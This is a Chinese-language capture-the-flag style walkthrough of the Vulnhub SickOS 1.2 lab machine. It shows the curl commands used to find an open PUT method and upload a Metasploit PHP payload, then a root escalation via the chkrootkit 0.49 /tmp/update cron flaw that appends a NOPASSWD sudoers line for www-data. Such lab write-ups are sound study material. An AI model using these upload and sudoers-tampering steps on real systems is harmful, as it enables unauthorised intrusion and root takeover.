2021年1月19日-NO14-Vulnhub-SickOS1.2渗透学习

2021年1月19日-NO:14-Vulnhub-SickOS:1.2渗透学习

一、简介

靶机地址:https://www.vulnhub.com/entry/sickos-12,144/

kali地址:192.168.56.105

靶机IP地址:192.168.56.107

主要工具:curl,Metasploit

二、信息收集

image-20210119223336375

image-20210119223550266

靶机开放着,22和80端口

访问 web页面

image-20210119223701467

只有一张图片,有点像何润东呢

进行目录爆破

image-20210119223933417

发现test目录,访问试试

image-20210119224009170

然而啥也没有

继续使用nikto扫描

image-20210119224406874

再使用curl检查目录test上能用的HTTP方法

curl -v -X OPTIONS http://192.168.56.107/test/

image-20210119224701552

可以上传文件

三、提权

使用msf制作biu.php ,作用你懂的

image-20210119232152794

利用curl上传

curl --upload-file biu.php -v --url http://192.168.56.107/test/biu.php -0 --http1.0

image-20210119225435722

image-20210119225501609

上传成功

使用Metasploit连接

image-20210119234921339

在web页面点击biu.php, msf将获得shell

image-20210119231046689

image-20210119231401969

找到了chkrootkit 0.49 ,向量提权

查看版本,注意 -V是大写

image-20210119231513320

使用谷歌大法 搜索

image-20210119231757798

image-20210119231814460

可以用33899.c进行提权
需文件需要位于/ tmp / update

image-20210119231847305

原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。可以利用这一点,在/tmp目录下新建update文件,让root帮我们做事情。

image-20210119234603465

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

使用 sudo su - 提权

image-20210119234627553

成功获得root权限

image-20210119234717170

获得 flag

之前设置了其他端口怎样都获取不到shell,原来防火墙设置了规则,只允许80,8080,22,443进出

image-20210119234823251

四、总结

只能使用443端口 是没有想到的

root权限运行

 chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL

可以通过 sudo su - 不用输入密码获得root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值